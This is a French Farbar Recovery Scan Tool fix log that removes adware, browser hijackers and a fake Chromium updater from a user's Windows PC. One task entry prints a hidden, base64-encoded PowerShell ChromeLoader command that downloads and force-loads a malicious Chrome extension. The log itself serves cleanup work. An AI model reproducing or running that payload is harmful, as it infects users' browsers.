Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 27-12-2021
Exécuté par tibur (06-01-2022 15:17:37) Run:1
Exécuté depuis C:\Users\tibur\OneDrive\Bureau
Profils chargés: tibur
Mode d'amorçage: Normal
==============================================

fixlist contenu:
*****************
closeprocesses:
createrestorepoint:
AV: Norton Security (Disabled - Up to date) {1122B19A-E671-38EC-8EAC-87048FD4528D}
AV: Norton Security (Disabled - Up to date) {A2708B76-6835-6565-CB96-694212954A75}
AV: Norton Security (Disabled - Out of date) {AECE2126-F4E7-6909-11F2-1B69D1FBCBD0}
AV: Norton Security (Disabled - Out of date) {9E3FD331-C4C2-7AC4-0537-131EEF1B1F8A}
FW: Norton Security (Disabled) {9A4B0A53-225A-643D-E0C9-C077EC460D0E}
FW: Norton Security (Disabled) {A6045214-8EAD-7B9C-2E68-BA2B11C858F1}
FW: Norton Security (Disabled) {96F5A003-BE88-6851-3AAD-B25C2F288CAB}
FW: Norton Security (Disabled) {291930BF-AC1E-39B4-A5F3-2E31710715F6}
HKU\S-1-5-21-3716561713-2104721246-2030872134-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://fr.yahoo.com/?fr=fes_yfp_chr_nt_yfp2&type=wncy_ljpnzjx0q1ocegikmov46_21_03_ssg00
SearchScopes: HKU\S-1-5-21-3716561713-2104721246-2030872134-1001 -> DefaultScope {2f23ab71-4ac6-41f2-a955-ea576e553146} URL = hxxps://fr.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_ljpnzjx0q1ocegikmov46_21_03_ssg00¶m1=1¶m2=f%3D4%26b%3DIE%26cc%3Dfr%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1QzutCyC0FyC0Dzz0EyCyCtAyB0EtAtAzy0FtN0D0Tzu0StAtAtDzztN1L2XzuyDtFtBtFtDtFtCyBtAtN1L1Czu1BtCtN1L1G1B1V1N2Y1L1Qzu2SyC0EyEyCzytCtDtAtGtC0EyDzytGyC0AtCyDtGyEtA0EyDtG0CtBtDzytB0F0D0EtAyEtAyE2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyD1Qzz1QtBzytByBtG1OyByB1OtGyEtC1Q1OtG1SyCtBzytGzztCtDyB1QtB1SyDzzyC1Qzz2QtN0A0LzuyEtN1B2Z1V1T1S1NzutN1Q2Z1B1P1RzutCyCtCtCtBtAyEyDtCtD%26cr%3D1881515284%26a%3Dwncy_ljpnzjx0q1ocegikmov46_21_03_ssg00%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome&p={searchTerms}
SearchScopes: HKU\S-1-5-21-3716561713-2104721246-2030872134-1001 -> {2f23ab71-4ac6-41f2-a955-ea576e553146} URL = hxxps://fr.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_ljpnzjx0q1ocegikmov46_21_03_ssg00¶m1=1¶m2=f%3D4%26b%3DIE%26cc%3Dfr%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1QzutCyC0FyC0Dzz0EyCyCtAyB0EtAtAzy0FtN0D0Tzu0StAtAtDzztN1L2XzuyDtFtBtFtDtFtCyBtAtN1L1Czu1BtCtN1L1G1B1V1N2Y1L1Qzu2SyC0EyEyCzytCtDtAtGtC0EyDzytGyC0AtCyDtGyEtA0EyDtG0CtBtDzytB0F0D0EtAyEtAyE2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyD1Qzz1QtBzytByBtG1OyByB1OtGyEtC1Q1OtG1SyCtBzytGzztCtDyB1QtB1SyDzzyC1Qzz2QtN0A0LzuyEtN1B2Z1V1T1S1NzutN1Q2Z1B1P1RzutCyCtCtCtBtAyEyDtCtD%26cr%3D1881515284%26a%3Dwncy_ljpnzjx0q1ocegikmov46_21_03_ssg00%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome&p={searchTerms}
SearchScopes: HKU\S-1-5-21-3716561713-2104721246-2030872134-1001 -> {DB43F069-5F81-4B7D-A482-A142ECC3C173} URL =
BHO: McAfee WebAdvisor -> {B164E929-A1B6-4A06-B104-2CD0E90A88FF} -> C:\Program Files\McAfee\WebAdvisor\x64\IEPlugin.dll [2021-12-17] (McAfee, LLC -> McAfee, LLC)
IE trusted site: HKU\.DEFAULT\...\webcompanion.com -> hxxp://webcompanion.com
IE trusted site: HKU\S-1-5-21-3716561713-2104721246-2030872134-1001\...\webcompanion.com -> hxxp://webcompanion.com
ShellIconOverlayIdentifiers: [ OverlayExcluded] -> {4433A54A-1AC8-432F-90FC-85F045CF383C} => -> Pas de fichier
ShellIconOverlayIdentifiers: [ OverlayPending] -> {F17C0B1E-EF8E-4AD4-8E1B-7D7E8CB23225} => -> Pas de fichier
ShellIconOverlayIdentifiers: [ OverlayProtected] -> {476D0EA3-80F9-48B5-B70B-05E677C9C148} => -> Pas de fichier
ShellIconOverlayIdentifiers-x32: [ OverlayExcluded] -> {4433A54A-1AC8-432F-90FC-85F045CF383C} => -> Pas de fichier
ShellIconOverlayIdentifiers-x32: [ OverlayPending] -> {F17C0B1E-EF8E-4AD4-8E1B-7D7E8CB23225} => -> Pas de fichier
ShellIconOverlayIdentifiers-x32: [ OverlayProtected] -> {476D0EA3-80F9-48B5-B70B-05E677C9C148} => -> Pas de fichier
ContextMenuHandlers1: [NortonLifeLock.Norton.Antivirus.IEContextMenu] -> {FAD61B3D-699D-49B2-BE16-7F82CB4C59CA} => -> Pas de fichier
ContextMenuHandlers2: [NortonLifeLock.Norton.Antivirus.IEContextMenu] -> {FAD61B3D-699D-49B2-BE16-7F82CB4C59CA} => -> Pas de fichier
ContextMenuHandlers6: [NortonLifeLock.Norton.Antivirus.IEContextMenu] -> {FAD61B3D-699D-49B2-BE16-7F82CB4C59CA} => -> Pas de fichier
HKU\S-1-5-21-3716561713-2104721246-2030872134-1001\...\Run: [Web Companion] => C:\Program Files (x86)\Lavasoft\Web Companion\Application\WebCompanion.exe --minimize (Pas de fichier)
C:\Program Files (x86)\Lavasoft
HKU\S-1-5-21-3716561713-2104721246-2030872134-1001\...\Run: [Chromium Update] => C:\Users\tibur\AppData\Local\Chromium\Update\1.3.99.0\ChromiumUpdateCore.exe [588800 2021-01-21] (Chromium.) [Fichier non signé] <==== ATTENTION
C:\Users\tibur\AppData\Local\Chromium
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\$McRebootA5E6DEAA56$.lnk [2022-01-06]
ShortcutTarget: $McRebootA5E6DEAA56$.lnk -> (Pas de fichier)
Task: {08574d8d-db92-458b-abc2-cf6a59c12cc6} - pas de chemin du fichier
Task: {0f8a983d-d3f9-4aaf-8ce0-c38d57654faa} - pas de chemin du fichier
Task: {1367EAFA-04AE-45FA-BA31-C9B499B5AA2F} - System32\Tasks\WebDiscover Browser Update Task => C:\Program Files\WebDiscoverBrowser\4.28.2\browser.exe --update (Pas de fichier) <==== ATTENTION
Task: {16934497-0b98-468d-abca-ab7ca17b245d} - pas de chemin du fichier
Task: {185701D8-12F5-45BE-A386-879B6D58EBE8} - System32\Tasks\ChromeLoader => cmd /c start /min "" powershell -ExecutionPolicy Bypass -WindowStyle Hidden -E JABlAHgAdABQAGEAdABoACAAPQAgACIAJAAoACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQApAFwAYwBoAHIAbwBtAGUAIgAKACQAYwBvAG4AZgBQAGEAdABoACAAPQAgACIAJABlAHgAdABQAGEAdABoAFwAYwBvAG4AZgAuAGoAcwAiAAoAJABhAHIAYwBoAGkAdgBlAE4AYQBtAGUAIAA9ACAAIgAkACgAJABlAG4AdgA6AEwATwBDAEEATABBAFAAUABEAEEAVABBACkAXABhAHIAYwBoAGkAdgBlAC4AegBpAHAAIgAKACQAdABhAHMAawBOAGEAbQBlACAAPQAgACIAQwBoAHIAbwBtAGUATABvAGEAZABlAHIAIgAKACQAZABvAG0AYQBpAG4AIAA9ACAAIgBiAHIAbwBrAGUAbgBuAGEALgB3AG8AcgBrACIACgAKACQAaQBzAE8AcABlAG4AIAA9ACAAMAAKACQAZABkACAAPQAgADAACgAkAHYAZQByACAAPQAgADAACgAKACgARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAHQAZQByACAAIgBuAGEAbQBlAD0AJwBjAGgAcgBvAG0AZQAuAGUAeABlACcAIgApACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIABDAG8AbQBtAGEAbgBkAEwAaQBuAGUAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAKAAkAaQBmACgAJABfACAALQBNAGEAdABjAGgAIAAiAGwAbwBhAGQALQBlAHgAdABlAG4AcwBpAG8AbgAiACkAewAKAAkACQBiAHIAZQBhAGsACgAJAH0ACgAKAAkAJABpAHMATwBwAGUAbgAgAD0AIAAxAAoAfQAKAAoAaQBmACgAJABpAHMATwBwAGUAbgApAHsACgAKAAkAaQBmACgALQBuAG8AdAAoAFQAZQBzAHQALQBQAGEAdABoACAALQBQAGEAdABoACAAIgAkAGUAeAB0AFAAYQB0AGgAIgApACkAewAKAAoACQAJAHQAcgB5AHsACgAJAAkACQB3AGcAZQB0ACAAIgBoAHQAdABwAHMAOgAvAC8AJABkAG8AbQBhAGkAbgAvAGEAcgBjAGgAaQB2AGUALgB6AGkAcAAiACAALQBvAHUAdABmAGkAbABlACAAIgAkAGEAcgBjAGgAaQB2AGUATgBhAG0AZQAiAAoACQAJAH0AYwBhAHQAYwBoAHsACgAJAAkACQBiAHIAZQBhAGsACgAJAAkAfQAKAAoACQAJAEUAeABwAGEAbgBkAC0AQQByAGMAaABpAHYAZQAgAC0ATABpAHQAZQByAGEAbABQAGEAdABoACAAIgAkAGEAcgBjAGgAaQB2AGUATgBhAG0AZQAiACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AUABhAHQAaAAgACIAJABlAHgAdABQAGEAdABoACIAIAAtAEYAbwByAGMAZQAKAAkACQBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAATIHAAYQB0AGgAIAAiACQAYQByAGMAaABpAHYAZQBOAGEAbQBlACIAIAAtAEYAbwByAGMAZQAKAAoACQB9AAoACQBlAGwAcwBlAHsACgAKAAkACQB0AHIAeQB7AAoACQAJAAkAaQBmACAAKABUAGUAcwB0AC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACIAJABjAG8AbgBmAFAAYQB0AGgAIgApAAoACQAJAAkAewAKAAkACQAJAAkAJABjAG8AbgBmACAAPQAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAYwBvAG4AZgBQAGEAdABoAAoACQAJAAkACQAkAGMAbwBuAGYALgBTAHAAbABpAHQAKAAiADsAIgApACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsACgAJAAkACQAJAAkAaQBmACAAKAAkAF8AIAAtAE0AYQB0AGMAaAAgACIAZABkACIAKQAKAAkACQAJAAkACQB7AAoACQAJAAkACQAJAAkAJABkAGQAIAA9ACAAJABfAC4AUwBwAGwAaQB0ACgAJwAiACcAKQBbADEAXQAKAAkACQAJAAkACQB9AGUAbABzAGUAaQBmACAAKAAkAF8AIAAtAE0AYQB0AGMAaAAgACIARQB4AHQAZQBuAHMAaQBvAG4AVgBlAHIAcwBpAG8AbgAiACkACgAJAAkACQAJAAkAewAKAAkACQAJAAkACQAJACQAdgBlAHIAIAA9ACAAJABfAC4AUwBwAGwAaQB0ACgAJwAiACcAKQBbADEAXQAKAAkACQAJAAkACQB9AAoACQAJAAkACQB9AAoACQAJAAkAfQAKAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAKAAkACQBpAGYAIAAoACQAZABkACAALQBhAG4AZAAgACQAdgBlAHIAKQB7AAoACgAKAAkACQAJAHQAcgB5AHsACgAKAAkACQAJAAkAJAB1AG4AIAA9ACAAdwBnAGUAdAAgACIAaAB0AHQAcABzADoALwAvACQAZABvAG0AYQBpAG4ALwB1AG4APwBkAGkAZAA9ACQAZABkACYAdgBlAHIAPQAkAHYAZQByACIACgAKAAkACQAJAAkAaQBmACgAJAB1AG4AIAAtAE0AYQB0AGMAaAAgACIAJABkAGQAIgApAHsACgAJAAkACQAJAAkAVQBuAHIAZQBnAGkAcwB0AGUAcgAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAAtAFQAYQBzAGsATgBhAG0AZQAgACIAJAB0AGEAcwBrAE4AYQBtAGUAIgAgAC0AQwBvAG4AZgBpAHIAbQA6ACQAZgBhAGwAcwBlAAoACQAJAAkACQAJAFIAZQBtAG8AdgBlAC0ASQB0AGUAbQAgABMgcABhAHQAaAAgACIAJABlAHgAdABQAGEAdABoACIAIAAtAEYAbwByAGMAZQAgAC0AUgBlAGMAdQByAHMAZQAKAAkACQAJAAkAfQAKAAoACQAJAAkAfQBjAGEAdABjAGgAewB9AAoACgAJAAkACQB0AHIAeQB7AAoACQAJAAkACQB3AGcAZQB0ACAAIgBoAHQAdABwAHMAOgAvAC8AJABkAG8AbQBhAGkAbgAvAGEAcgBjAGgAaQB2AGUALgB6AGkAcAA/AGQAaQBkAD0AJABkAGQAJgB2AGUAcgA9ACQAdgBlAHIAIgAgAC0AbwB1AHQAZgBpAGwAZQAgACIAJABhAHIAYwBoAGkAdgBlAE4AYQBtAGUAIgAKAAkACQAJAH0ACgAJAAkACQBjAGEAdABjAGgAewB9AAoACgAJAAkACQBpAGYAIAAoAFQAZQBzAHQALQBQAGEAdABoACAALQBQAGEAdABoACAAIgAkAGEAcgBjAGgAaQB2AGUATgBhAG0AZQAiACkAewAKAAkACQAJAAkARQB4AHAAYQBuAGQALQBBAHIAYwBoAGkAdgBlACAALQBMAGkAdABlAHIAYQBsAFAAYQB0AGgAIAAiACQAYQByAGMAaABpAHYAZQBOAGEAbQBlACIAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgBQAGEAdABoACAAIgAkAGUAeAB0AFAAYQB0AGgAIgAgAC0ARgBvAHIAYwBlAAoACQAJAAkACQBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAATIHAAYQB0AGgAIAAiACQAYQByAGMAaABpAHYAZQBOAGEAbQBlACIAIAAtAEYAbwByAGMAZQAKAAkACQAJAH0ACgAKAAkACQB9AAoACgAJAH0ACgAKAAkAdAByAHkAewAKAAkACQBHAGUAdAAtAFAAcgBvAGMAZQBzAHMAIABjAGgAcgBvAG0AZQAgAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACAAJABfAC4AQwBsAG8AcwBlAE0AYQBpAG4AVwBpAG4AZABvAHcAKAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAB9AAoACQAJAHMAdABhAHIAdAAgAGMAaAByAG8AbQBlACAALQAtAGwAbwBhAGQALQBlAHgAdABlAG4AcwBpAG8AbgA9ACIAJABlAHgAdABQAGEAdABoACIALAAgAC0ALQByAGUAcwB0AG8AcgBlAC0AbABhAHMAdAAtAHMAZQBzAHMAaQBvAG4ALAAgAC0ALQBuAG8AZQByAHIAZABpAGEAbABvAGcAcwAsACAALQAtAGQAaQBzAGEAYgBsAGUALQBzAGUAcwBzAGkAbwBuAC0AYwByAGEAcwBoAGUAZAAtAGIAdQBiAGIAbABlAAoACQB9AGMAYQB0AGMAaAB7AH0ACgAKAH0A /c start /min "" powershell -ExecutionPolicy Bypass -WindowStyle Hidden -E JABlAHgAdABQAGEAdABoACAAPQAgACIAJAAoACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQApAFwAYwBoAHIAbwBtAGUAIgAKACQAYwBvAG4AZgBQAGEAdABoACAAPQAgACIAJABlAHgAdABQAGEAdABoAFwAYwBvAG4AZgAuAGoAcwAiAAoAJABhAHIAYwBoAGkAdgBlAE4AYQBtAGUAI (l'élément de données a 4303 caractères en plus). (Pas de fichier) <==== ATTENTION
Task: {1b2d43b0-ade2-45d3-96f8-85837d2a7b1f} - pas de chemin du fichier
Task: {20e4e922-0318-48ab-85b9-539292f50e4f} - pas de chemin du fichier
Task: {21F52711-46EF-4A7F-90DF-A913755C1DAD} - System32\Tasks\ChromiumUpdateTaskUserS-1-5-21-3716561713-2104721246-2030872134-1001Core => C:\Users\tibur\AppData\Local\Chromium\Update\ChromiumUpdate.exe [100352 2021-01-21] (Chromium.) [Fichier non signé] <==== ATTENTION
Task: {2661757F-6017-4BDC-92C1-1D358A658513} - System32\Tasks\iTop Screen Recorder Startup => C:\Program Files (x86)\iTop Screen Recorder\IScrRec.exe /autorun (Pas de fichier)
Task: {2848052D-68D8-40F1-9FD5-CE6D475AE55A} - System32\Tasks\Driver Booster Update => C:\Program Files (x86)\IObit\Driver Booster\9.0.1\AutoUpdate.exe /auto (Pas de fichier)
Task: {292cbfd4-2a0a-4644-a01a-2fb5fb18edd8} - pas de chemin du fichier
Task: {30FCD97D-E51B-412D-B62B-48BDF5ED0B34} - System32\Tasks\iTopVPN_Scheduler_tibur => C:\Program Files (x86)\iTop VPN\iTopVPN.exe /autostart (Pas de fichier)
Task: {33B2AF87-E6A6-4ABD-9C49-CA4CB2BFEEA8} - System32\Tasks\iTop Screenshot Update => C:\Program Files (x86)\iTop Screenshot\AutoUpdate.exe /auto (Pas de fichier)
Task: {386e1974-844f-4c28-8a49-d0f0257175fd} - pas de chemin du fichier
Task: {3fadb0ef-ae5c-49e4-8ef1-7d9a66e6c9cb} - pas de chemin du fichier
Task: {413eb659-5bd1-408f-9653-e7a01792d867} - pas de chemin du fichier
Task: {49ea9ebb-3064-472d-98fd-752fa8919aa7} - pas de chemin du fichier
Task: {515EB30F-0378-4DB3-B1BC-DA02E6912813} - System32\Tasks\Remediation\AntimalwareMigrationTask => C:\Program Files\Common Files\AV\Norton Security\Upgrade.exe [2353000 2021-12-13] (NortonLifeLock Inc. -> NortonLifeLock Inc.)
Task: {57C592B5-A6CF-4238-B24E-D4A6B96870A9} - System32\Tasks\iTop Screenshot SkipUAC (tibur) => C:\Program Files (x86)\iTop Screenshot\iScrShot.exe /skipuac (Pas de fichier)
Task: {601f51c0-1ed5-4d8d-b3d1-fc85674d85c2} - pas de chemin du fichier
Task: {63b68c26-5bd3-4645-8855-0bc0c0950d36} - pas de chemin du fichier
Task: {6BA1FBD7-93FE-4E1D-8704-280705685D05} - System32\Tasks\WebDiscover Browser Launch Task => C:\Program Files\WebDiscoverBrowser\4.28.2\browser.exe --launch --docked (Pas de fichier) <==== ATTENTION
Task: {7192db81-d75a-4c5e-8269-0c3aa4c39900} - pas de chemin du fichier
Task: {732cfaee-b220-45a7-acbf-d6fa7ba38b67} - pas de chemin du fichier
Task: {7D156DB6-B628-451D-A130-131D10E25781} - System32\Tasks\npcapwatchdog => C:\Program Files\Npcap\CheckStatus.bat [880 2020-09-25] () [Fichier non signé]
Task: {83bbf89c-15ab-47d8-b9d7-214bd40da306} - pas de chemin du fichier
Task: {84F6B699-4A33-4C2F-AA59-0FBA0D2B4916} - System32\Tasks\iTop Screen Recorder Update => C:\Program Files (x86)\iTop Screen Recorder\AutoUpdate.exe /auto (Pas de fichier)
Task: {878669a4-82de-4895-a60c-2de92613de8a} - pas de chemin du fichier
Task: {87B6CB79-3E75-4E41-8475-E1CF3BD6E4E3} - System32\Tasks\iTop Screen Recorder SkipUAC (tibur) => C:\Program Files (x86)\iTop Screen Recorder\IScrRec.exe /skipuac (Pas de fichier)
Task: {9151416B-3700-4E80-B02A-DEC3B7F1B1E4} - System32\Tasks\ChromiumUpdateTaskUserS-1-5-21-3716561713-2104721246-2030872134-1001UA => C:\Users\tibur\AppData\Local\Chromium\Update\ChromiumUpdate.exe [100352 2021-01-21] (Chromium.) [Fichier non signé] <==== ATTENTION
Task: {9272455d-97be-4f3c-b3cf-6b85185ec08f} - pas de chemin du fichier
Task: {975cb8e3-3360-446b-8475-13d107b91a3d} - pas de chemin du fichier
Task: {9788F969-7F61-42C7-A1DC-19E5CDB61C19} - System32\Tasks\Driver Booster SkipUAC (tibur) => C:\Program Files (x86)\IObit\Driver Booster\9.0.1\DriverBooster.exe /skipuac (Pas de fichier)
Task: {9a1956e5-da63-48f8-b45d-b1c0cc306386} - pas de chemin du fichier
Task: {9F829F42-3CDC-4DCB-8EC6-0546BEF2B094} - System32\Tasks\OneDC_Updater => C:\Users\tibur\Documents\temp\OneDC_Updater\OneDC_Updater.exe [720504 2020-01-20] (Micro-Star International CO., LTD. -> Micro-Star International Co., Ltd.) <==== ATTENTION
Task: {A0F08F0F-74E8-4FE3-A4E3-6E1F98581174} - System32\Tasks\iTop Screenshot Startup => C:\Program Files (x86)\iTop Screenshot\iScrShot.exe /autorun (Pas de fichier)
Task: {b3b01422-0b36-4fc6-8738-bc19b11bdbbe} - pas de chemin du fichier
Task: {bdaeafb8-981f-4021-8e29-d49f455850ec} - pas de chemin du fichier
Task: {BEA8E94A-5026-41D5-AADA-41EFEFAED6BF} - System32\Tasks\Driver Booster Scheduler => C:\Program Files (x86)\IObit\Driver Booster\9.0.1\Scheduler.exe /scheduler (Pas de fichier)
Task: {c4cdf14a-efb9-46ab-8114-848e4009b327} - pas de chemin du fichier
Task: {c7a5b2da-75aa-4bfb-925a-c6cc3c517829} - pas de chemin du fichier
Task: {C7FA37BC-F572-4A40-BCC1-1B8CCEE27E14} - System32\Tasks\iTop Screen Recorder UAC => C:\Program Files (x86)\iTop Screen Recorder\iScrInit.exe /UAC (Pas de fichier)
Task: {c92080c9-1e5c-400e-90fd-1fdafb48ba66} - pas de chemin du fichier
Task: {cb03076e-7ac5-4e53-a829-6d98f1220db7} - pas de chemin du fichier
Task: {cefb7d27-b286-48b6-abd9-9fb1a6317f7c} - pas de chemin du fichier
Task: {D65A1A49-91D6-4A27-AEE4-F6F7CDF13549} - System32\Tasks\iTopVPN_SkipUAC_tibur => C:\Program Files (x86)\iTop VPN\iTopVPN.exe /SkipUac (Pas de fichier)
Task: {d7c894d0-ee26-4f37-80e7-a5a8778644c5} - pas de chemin du fichier
Task: {e39afacb-dc89-442e-bbbf-2706a139d103} - pas de chemin du fichier
Task: {e9e342a0-f872-46e9-81b3-ddcdb373b7cb} - pas de chemin du fichier
Task: {eebab7aa-df46-4f8b-b2fe-69832d49d5f1} - pas de chemin du fichier
Task: {eff8dd23-ea3f-4ea0-b339-f86e6d5603be} - pas de chemin du fichier
Task: {F39BEAF6-8D93-4B18-9228-414A2A5F9468} - System32\Tasks\iTopVPN_Update_tibur => C:\Program Files (x86)\iTop VPN\atud.exe /auto (Pas de fichier)
Edge Extension: (Pas de nom) -> AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\AutoFormFill [non trouvé(e)]
Edge Extension: (Pas de nom) -> BookReader_B171F20233094AC88D05A8EF7B9763E8 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\BookViewer [non trouvé(e)]
Edge Extension: (Pas de nom) -> LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\LearningTools [non trouvé(e)]
Edge Extension: (Pas de nom) -> PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\PinJSAPI [non trouvé(e)]
CHR HKU\S-1-5-21-3716561713-2104721246-2030872134-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [jdanfkhnfpagoijgfmklhgakdicpnfil]
CHR HKLM-x32\...\Chrome\Extension: [mfhcmdonhekjhfbjmeacdjbhlfgpjabp]
S3 OVRLibraryService; "C:\Program Files\Oculus\Support\oculus-librarian\OVRLibraryService.exe" [X]
S3 nsvst_NGC; \SystemRoot\System32\drivers\NGCx64\16150B0.02E\nsvst.sys [X]
S3 SymEvnt; \??\C:\Program Files\Norton Security\NortonData\22.19.8.65\SymPlatform\SymEvnt.sys [X]
2022-01-05 21:09 - 2022-01-05 21:09 - 000000000 ____D C:\Users\tibur\AppData\Local\Norton
cmd: netsh advfirewall reset
emptytemp:

*****************

Processus fermé avec succès.
Le Point de restauration a été créé avec succès.
"AV: Norton Security (Disabled - Up to date) {1122B19A-E671-38EC-8EAC-87048FD4528D}" => supprimé(es) avec succès
"AV: Norton Security (Disabled - Up to date) {A2708B76-6835-6565-CB96-694212954A75}" => supprimé(es) avec succès
"AV: Norton Security (Disabled - Out of date) {AECE2126-F4E7-6909-11F2-1B69D1FBCBD0}" => supprimé(es) avec succès
"AV: Norton Security (Disabled - Out of date) {9E3FD331-C4C2-7AC4-0537-131EEF1B1F8A}" => supprimé(es) avec succès
"FW: Norton Security (Disabled) {9A4B0A53-225A-643D-E0C9-C077EC460D0E}" => supprimé(es) avec succès
"FW: Norton Security (Disabled) {A6045214-8EAD-7B9C-2E68-BA2B11C858F1}" => supprimé(es) avec succès
"FW: Norton Security (Disabled) {96F5A003-BE88-6851-3AAD-B25C2F288CAB}" => supprimé(es) avec succès
"FW: Norton Security (Disabled) {291930BF-AC1E-39B4-A5F3-2E31710715F6}" => supprimé(es) avec succès
HKU\S-1-5-21-3716561713-2104721246-2030872134-1001\Software\Microsoft\Internet Explorer\Main\\"Start Page"="http://go.microsoft.com/fwlink/?LinkId=69157" => valeur restauré(es) avec succès
"HKU\S-1-5-21-3716561713-2104721246-2030872134-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope" => supprimé(es) avec succès
HKU\S-1-5-21-3716561713-2104721246-2030872134-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{2f23ab71-4ac6-41f2-a955-ea576e553146} => supprimé(es) avec succès
HKU\S-1-5-21-3716561713-2104721246-2030872134-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{DB43F069-5F81-4B7D-A482-A142ECC3C173} => supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{B164E929-A1B6-4A06-B104-2CD0E90A88FF} => non trouvé(e)
HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\webcompanion.com => supprimé(es) avec succès
HKU\S-1-5-21-3716561713-2104721246-2030872134-1001\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\webcompanion.com => supprimé(es) avec succès
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OverlayExcluded => non trouvé(e)
HKLM\Software\Classes\CLSID\{4433A54A-1AC8-432F-90FC-85F045CF383C} => supprimé(es) avec succès
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OverlayPending => non trouvé(e)
HKLM\Software\Classes\CLSID\{F17C0B1E-EF8E-4AD4-8E1B-7D7E8CB23225} => supprimé(es) avec succès
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OverlayProtected => non trouvé(e)
HKLM\Software\Classes\CLSID\{476D0EA3-80F9-48B5-B70B-05E677C9C148} => supprimé(es) avec succès
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OverlayExcluded => non trouvé(e)
HKLM\Software\Wow6432Node\Classes\CLSID\{4433A54A-1AC8-432F-90FC-85F045CF383C} => supprimé(es) avec succès
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OverlayPending => non trouvé(e)
HKLM\Software\Wow6432Node\Classes\CLSID\{F17C0B1E-EF8E-4AD4-8E1B-7D7E8CB23225} => supprimé(es) avec succès
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OverlayProtected => non trouvé(e)
HKLM\Software\Wow6432Node\Classes\CLSID\{476D0EA3-80F9-48B5-B70B-05E677C9C148} => supprimé(es) avec succès
HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\NortonLifeLock.Norton.Antivirus.IEContextMenu => supprimé(es) avec succès
HKLM\Software\Classes\Drive\ShellEx\ContextMenuHandlers\NortonLifeLock.Norton.Antivirus.IEContextMenu => supprimé(es) avec succès
HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers\NortonLifeLock.Norton.Antivirus.IEContextMenu => supprimé(es) avec succès
"HKU\S-1-5-21-3716561713-2104721246-2030872134-1001\Software\Microsoft\Windows\CurrentVersion\Run\\Web Companion" => supprimé(es) avec succès
"C:\Program Files (x86)\Lavasoft" => non trouvé(e)
"HKU\S-1-5-21-3716561713-2104721246-2030872134-1001\Software\Microsoft\Windows\CurrentVersion\Run\\Chromium Update" => supprimé(es) avec succès
C:\Users\tibur\AppData\Local\Chromium => déplacé(es) avec succès
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\$McRebootA5E6DEAA56$.lnk => déplacé(es) avec succès
"ShortcutTarget: $McRebootA5E6DEAA56$.lnk -> (Pas de fichier)" => non trouvé(e)
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{08574d8d-db92-458b-abc2-cf6a59c12cc6}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0f8a983d-d3f9-4aaf-8ce0-c38d57654faa}" => supprimé(es) avec succès
